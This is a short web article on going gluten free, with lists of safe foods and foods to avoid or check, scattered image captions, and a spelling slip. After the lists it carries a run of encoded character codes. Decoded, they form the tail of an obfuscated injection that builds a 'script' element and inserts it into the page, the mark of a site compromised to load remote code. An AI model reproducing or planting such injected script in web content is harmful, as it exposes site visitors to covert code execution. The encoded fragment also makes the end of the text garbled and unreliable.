Here’s what you need to know to go gluten free


People with celiac disease can’t tolerate gluten, not even small amounts, so they are required to cut out gluten completely from their diet. In people with celiac disease, gluten triggers an immune response that damages the lining of the small intestine, which interferes with the absorption of nutrients from food, causing a host of other problems. However, it is a not recommended measure for healthy people.

Avoiding gluten means more than giving up traditional breads, cereals, pasta and beer. Gluten is also present in many other products, including frozen vegetables, in various sauces, foods made with natural flavourings, vitamin and mineral supplements. Many healthy foods are naturally gluten-free, including fruits, vegetables, fresh meat, fish and poultry.

bread

Smoothies sold sometimes contain tricky ingredients like wheat grass or barley grass, so it’s important to check labels and only buy smoothies that are labelled gluten-free. Nutrient deficiencies can be a potential side effect when observing a gluten-free diet. As a result, your doctor may need to prescribe supplements to you or prescribe dedicated gluten-free products to help avoid deficiencies. Sticking to a gluten-free diet can be tough but with the all necessary knowledge and an optimistic approach, you can live a full and healthy gluten-free life.

Gluten-Free Foods

Beverages & Drinks: fruit juice, flavoured water, fizzy drinks, energy drinks, coffee, tea, cider, wine, sherry, spirits, liqueurs Dairy Products: milk, butter, ghee, cheese, cream, cottage cheese, sour cream, yogurt

juice

Proteins: legumes, nuts, red meat, poultry, seafood and traditional soy foods (tofu, tempeh, etc)

Sweets: chocolate, hard candy, gummies, ice cream, sherbet, gelato, frozen yogurt

Whole Grains: quinoa, brown rice, wild rice, buckwheat, sorghum, tapioca, millet, amaranth, teff, arrowroot

dariy-product

Foods to Avoid or Double-Check before Consumption

Beverages & Drinks: beers, ales and lagers made from gluten-containing grains, non-distilled liquors and other malt beverages, such as wine coolers

Dairy Products: flavoured dairy products may have added ingredients that contain gluten

dairy-product

Proteins: Battered and coated meats

Spices, Sauces and Condiments: ketchup and mustard, Worcestershire sauce, tomato sauce, pickles, barbecue sauce, mayonnaise, salad dressing, pasta sauce, dry spices, salsa, stock and bouillon cubes, marinades, gravy and stuffing mixes and rice vinegar

spices

Sweets: grain-based cookies, cake, brownies, pie, doughnuts, pastries, cheesecake, etc.

Whole Grains: barley, barley malt or extract, bran, bulgur, couscous, durum, farina, faro, kamut, malt, matzo flour or meal, orzo, panko, rye, seitan, semolina, spelt, triticale. udon, wheat, wheat bran, wheat germ, or wheat starch

10,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));

Comments